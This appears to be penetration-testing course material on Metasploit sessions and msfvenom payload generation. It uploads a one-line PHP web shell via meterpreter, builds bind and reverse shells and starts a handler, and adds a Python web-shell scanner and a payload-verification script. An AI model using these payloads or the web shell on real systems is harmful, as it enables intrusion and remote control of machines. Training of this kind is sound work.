Metasploit - usage
Before actual exploitation, you can check whether the
target is vulnerable to the selected exploit (not every
module implements a check; this one does)
• check

Metasploit - usage
After all options are set and verified, run the exploit
('-j' runs it as a background job, so the console stays
usable while the session comes in)
• exploit -j

Metasploit - usage
To list active/established sessions, type the following
command
• sessions -l

Metasploit - usage
To start interacting with an active session use the
following command (be sure to pick the correct session
number)
• sessions -i 1

Metasploit - usage
To display the 'meterpreter' help, type the following
• help

Metasploit - usage
In an active 'meterpreter' session you can run simple
file system commands
cat
cp
mkdir
mv
rm
etc.

Metasploit - usage
Since we already know that the target machine is running
the Linux operating system, let's switch from the
'meterpreter' shell to a Linux command shell
• shell

Metasploit - usage
To leave the remote shell and return to 'meterpreter',
type 'exit'
• exit

Metasploit - usage
Once you have a 'meterpreter' session, you can upload new
exploits/backdoors/files to the remote machine.
Open a new Kali Linux terminal and type the following
command to create a minimal PHP web shell that executes
whatever is passed in the 'c' query parameter
• echo '<?php system($_GET[c]);?>' > /tmp/file.php

Metasploit - usage
In the active 'meterpreter' session, upload the new file to
the specified remote location
• upload /tmp/file.php /var/www/html/file.php

Now open the new file in your browser and append '?c=id'
to the URL

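The web shell uploaded above is exactly what a defender should be hunting for in a web root. The following Python script is an added example (not part of the original course material): a weighted signature scan over PHP sources that flags command execution or eval() driven by request input, while a lone shell_exec('uptime') in a monitoring page stays below the threshold. The signature list and the sample files are constructed for this illustration and are not an exhaustive web shell ruleset.

```python
"""Spot PHP web shells like the one uploaded above in a web root.

Each signature carries a weight; a file is reported when its score reaches the
threshold, so a single shell_exec('uptime') in a monitoring page does not fire
but command execution driven by request input does.
"""
import os
import re

EXEC_FUNCS = r"(?:system|exec|shell_exec|passthru|popen|proc_open)"
REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE)"

SIGNATURES = [
    # (name, pattern, weight)
    ("exec_of_request_input", re.compile(EXEC_FUNCS + r"\s*\(\s*" + REQUEST_INPUT + r"\b"), 10),
    ("eval_of_request_input", re.compile(r"\beval\s*\(\s*" + REQUEST_INPUT + r"\b"), 10),
    ("eval_of_decoded_blob", re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("), 8),
    ("backtick_of_request_input", re.compile(r"`[^`]*" + REQUEST_INPUT + r"\["), 8),
    ("exec_function", re.compile(r"\b" + EXEC_FUNCS + r"\s*\("), 3),
    ("request_input", re.compile(REQUEST_INPUT + r"\["), 1),
]


def score_php(source):
    """Return (score, matched signature names) for one PHP source text."""
    score, names = 0, []
    for name, pattern, weight in SIGNATURES:
        if pattern.search(source):
            score += weight
            names.append(name)
    return score, names


def is_webshell(source, threshold=8):
    return score_php(source)[0] >= threshold


def scan_webroot(root, threshold=8):
    """Walk a directory tree and yield (path, score, names) for suspicious PHP files."""
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            if not filename.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, filename)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    source = fh.read()
            except OSError:
                continue
            score, names = score_php(source)
            if score >= threshold:
                yield path, score, names


# Constructed samples: the shell from the slide above plus benign look-alikes.
SAMPLES = {
    "file.php": "<?php system($_GET[c]);?>",
    "obfuscated.php": "<?php eval(base64_decode('cGhwaW5mbygpOw==')); ?>",
    "uptime.php": "<?php echo shell_exec('uptime'); ?>",
    "hello.php": "<?php echo htmlspecialchars($_GET['name']); ?>",
}


def demo():
    """Verdict per constructed sample file."""
    return {name: is_webshell(src) for name, src in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {'WEBSHELL' if verdict else 'ok'} {score_php(SAMPLES[name])}")
```

scan_webroot('/var/www/html') yields (path, score, matched signatures) for every file at or above the threshold; tune the weights to the code base, because a framework that legitimately calls exec() needs a higher bar or an allow-list of known files.
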
Metasploit - usage
At the 'meterpreter' prompt, typing 'exit' quits it.
This command shuts down the active session.

Metasploit - usage
To leave the meterpreter shell but keep the session
running in the background, type the following command:
• bg

Metasploit - usage
We also know that the remote target might have other
vulnerable services.

Try to exploit them!

Msfvenom
MSFvenom
Msfvenom is a standalone payload generator.

Msfvenom is a combination of Msfpayload and Msfencode,
putting both of these tools into a single framework and
making it the go-to tool for generating and encoding
payloads for different uses.

MSFvenom
In Kali we can list all msfvenom functionality by simply
running the following command
• msfvenom

MSFvenom
Supported platform list:
• AIX
• Android
• BSD
• BSDi
• Cisco
• Firefox
• FreeBSD
• hardware
• HPUX
• Irix
• Java
• JavaScript
• Linux
• mainframe
• multi
• Netware
• NetBSD
• NodeJS
• OpenBSD
• OSX
• PHP
• Python
• Ruby
• Solaris
• Unix
• Windows

MSFvenom
Msfvenom has different modules for specific actions. To
list all available payloads, type the following command in
your Kali terminal:
• msfvenom -l payloads

MSFvenom
Listing other modules
• msfvenom -l encoders
• msfvenom -l archs
• msfvenom -l platforms
• msfvenom -l encrypt

MSFvenom
Once a specific payload is chosen, you can list its
options
• msfvenom -p php/meterpreter/bind_tcp --list-options

MSFvenom
Before generating the desired payload, pay attention to
the required options

MSFvenom
For customised payload generation, you might want to
adjust the advanced options

MSFvenom
Before generating your first payload, you must know the
following
• type of payload

Will the payload be executed on a Linux or Windows
operating system?
What architecture is used on the target machine?
Will the payload be an .exe, ELF, PHP, Java or PowerShell
file?
To what IP address and port will the payload connect?

MSFvenom
Let's generate our first payload.
The payload will be executed on the Linux operating
system.
The payload will be an executable file (ELF).
The payload will run on a 64-bit system.
The listening IP address will be 127.0.0.1
The listening port will be 4567

MSFvenom
Let's check which payload options must be set
• msfvenom -p generic/shell_bind_tcp --list-options

MSFvenom
To generate the payload, type the following command in
your Kali terminal
• msfvenom -p generic/shell_bind_tcp LPORT=4567 -a x64 -f elf --platform Linux -o /tmp/shell01

MSFvenom
Set the executable bit on the file
• chmod a+x /tmp/shell01
Check the generated payload
• ls -la /tmp/shell01

Check the file type
• file /tmp/shell01

MSFvenom
Execute the payload
• /tmp/shell01

You will not see anything after execution: the process is
waiting for a connection on port 4567.

MSFvenom
Open a new Kali terminal window and type the following
command
• nc localhost 4567
You will not see any prompt or output.
Just type any Linux command

MSFvenom
Now we generate a new, reverse shell
• msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=5678 -f elf -o /tmp/shell02

MSFvenom
Set the executable bit on the file
• chmod a+x /tmp/shell02
Check the generated payload
• ls -la /tmp/shell02

Check the file type
• file /tmp/shell02

MSFvenom
Since we generated a reverse shell, once it is executed it
will connect back to the listening IP address and port
specified with the LHOST and LPORT options. The listener
must therefore be started first. In a new Kali terminal
window type the following command
• nc -lvp 5678

MSFvenom
Now we can execute our second shell. In a Kali terminal
window type the following (keep nc running in the other
terminal window)
• /tmp/shell02
If the reverse connection was established, you will see a
connection message in your "nc" terminal window

MSFvenom
Now you can run Linux commands

MSFvenom
Meterpreter shell
The Meterpreter (short for meta-interpreter) shell, a
special type of shell, is the bread and butter of
Metasploit. It can be delivered as a payload that is either
a bind shell or a reverse shell. Meterpreter is one of the
advanced payloads available in the MSF, but you should not
look at it as just a payload. Rather, view it as an
exploitation platform that runs in memory on the remote
system. It has its own command shell, which gives the
attacker a wide variety of actions that can be executed on
the exploited system.

MSFvenom
Let's generate a meterpreter reverse shell.
First, we have to check which options must be set before
generating the payload
• msfvenom -p linux/x64/meterpreter/reverse_tcp --list-options

MSFvenom
Type the following command in your Kali terminal
• msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=6789 -f elf -o /tmp/shell03

MSFvenom
Set the executable bit on the file
• chmod a+x /tmp/shell03
Check the generated payload
• ls -la /tmp/shell03

Check the file type
• file /tmp/shell03

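Before the handler is started it is worth confirming that the generated file really is what was asked for. The following Python script is an added example (not part of msfvenom or the original course material): it parses the ELF header to report the same class, endianness and machine that 'file' shows, compares them with the intended target, and searches the binary for the sockaddr_in bytes of LHOST:LPORT so that a payload generated with the wrong address or architecture is caught before it is deployed. The sockaddr_in search assumes the payload stores the structure contiguously in memory order, which holds for the stock Metasploit Linux reverse-shell stagers; the ELF header used in the offline demonstration is constructed and is not a runnable binary.

```python
"""Verify a msfvenom ELF payload before dropping it on a target.

Checks what 'file' reports (ELF class, endianness, type, machine) against the
intended target and, for connect-back payloads, that the configured LHOST:LPORT
is actually embedded in the binary.
"""
import ipaddress
import struct
import sys

ELF_MAGIC = b"\x7fELF"
MACHINES = {0x03: "x86", 0x28: "arm", 0x3E: "x86-64", 0xB7: "aarch64"}
TYPES = {2: "EXEC", 3: "DYN"}
# Header layout after e_ident: type, machine, version, entry, phoff, shoff,
# flags, ehsize, phentsize, phnum, shentsize, shnum, shstrndx
ELF64_FMT = "16sHHIQQQIHHHHHH"   # 64 bytes
ELF32_FMT = "16sHHIIIIIHHHHHH"   # 52 bytes


def elf_info(data):
    """Parse the ELF header and return the fields a payload check cares about."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2):
        raise ValueError("unknown ELF class")
    fmt = ("<" if ei_data == 1 else ">") + (ELF64_FMT if ei_class == 2 else ELF32_FMT)
    if len(data) < struct.calcsize(fmt):
        raise ValueError("truncated ELF header")
    _, e_type, e_machine, _, e_entry = struct.unpack_from(fmt, data)[:5]
    return {
        "bits": 64 if ei_class == 2 else 32,
        "endian": "little" if ei_data == 1 else "big",
        "type": TYPES.get(e_type, str(e_type)),
        "machine": MACHINES.get(e_machine, hex(e_machine)),
        "entry": e_entry,
    }


def sockaddr_in_bytes(host, port):
    """Bytes of a struct sockaddr_in as it sits in memory (and therefore in the payload).

    Assumption: the payload keeps the structure contiguous, as the stock
    Metasploit Linux reverse-shell stagers do: AF_INET as a native 16-bit value
    (little-endian on x86), then port and address in network byte order."""
    return struct.pack("<H", 2) + struct.pack(">H", port) + ipaddress.IPv4Address(host).packed


def check_payload(data, bits, machine, lhost=None, lport=None):
    """Return the mismatches between the binary and the intended target (empty = OK)."""
    info = elf_info(data)
    problems = []
    if info["bits"] != bits:
        problems.append(f"ELF class is {info['bits']}-bit, expected {bits}-bit")
    if info["machine"] != machine:
        problems.append(f"machine is {info['machine']}, expected {machine}")
    if lhost and lport and data.find(sockaddr_in_bytes(lhost, lport)) == -1:
        problems.append(f"no sockaddr_in for {lhost}:{lport} found; LHOST/LPORT do not match")
    return problems


def build_sample_elf64(body):
    """Constructed ELF64 x86-64 header followed by body, for exercising the checks offline.

    It has no program header table, so it is not runnable; msfvenom -f elf output
    carries a real PT_LOAD segment in front of the shellcode."""
    ident = ELF_MAGIC + bytes([2, 1, 1, 0, 0]) + b"\x00" * 7
    header = struct.pack("<" + ELF64_FMT, ident, 2, 0x3E, 1, 0x400078, 64, 0, 0, 64, 56, 1, 0, 0, 0)
    return header + body


if __name__ == "__main__":
    with open(sys.argv[1], "rb") as fh:
        blob = fh.read()
    lhost = sys.argv[2] if len(sys.argv) > 2 else None
    lport = int(sys.argv[3]) if len(sys.argv) > 3 else None
    print(elf_info(blob))
    print(check_payload(blob, 64, "x86-64", lhost, lport) or "payload matches")
```

Saved as, say, elfcheck.py, `python3 elfcheck.py /tmp/shell03 127.0.0.1 6789` prints the header fields and either 'payload matches' or the list of mismatches; the same check against /tmp/shell02 with port 5678 confirms the second payload.
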
MSFvenom
The next step is to run a Metasploit console with a
handler. Type the following command in a Kali terminal
• msfconsole

MSFvenom
Now let's configure a handler. In Metasploit type the
following command
• use exploit/multi/handler

MSFvenom
Before running the handler, we have to see which options
must be configured
• show options

MSFvenom
Now we have to set the options so that they match the
payload we generated - payload type, listening address
and port. linux/x64/meterpreter/reverse_tcp is a staged
payload: the small stager in /tmp/shell03 connects back
and the handler sends it the full Meterpreter stage, so
the handler's payload must be exactly the one used with
msfvenom
• set payload linux/x64/meterpreter/reverse_tcp
• set LHOST 127.0.0.1
• set LPORT 6789

MSFvenom
Before starting the handler, it is wise to re-check the
settings
• show options

MSFvenom
Once everything is correct, we can start the handler. Type
the following command in Metasploit
• run -j

MSFvenom
The final step is to launch the payload in a Kali terminal
• /tmp/shell03
If the payload was able to connect to the handler, a
"Meterpreter session opened" message will appear in the
Metasploit window

MSFvenom
Let's see the available sessions in Metasploit. Type the
following command
• sessions -l

MSFvenom
To start interacting with an available session, type the
following command (be sure to use the correct session ID
number)
• sessions -i 1

MSFvenom
Meterpreter allows you to run built-in commands or the
native shell of the remote system. To see the full list of
available commands, type the following in Metasploit
• help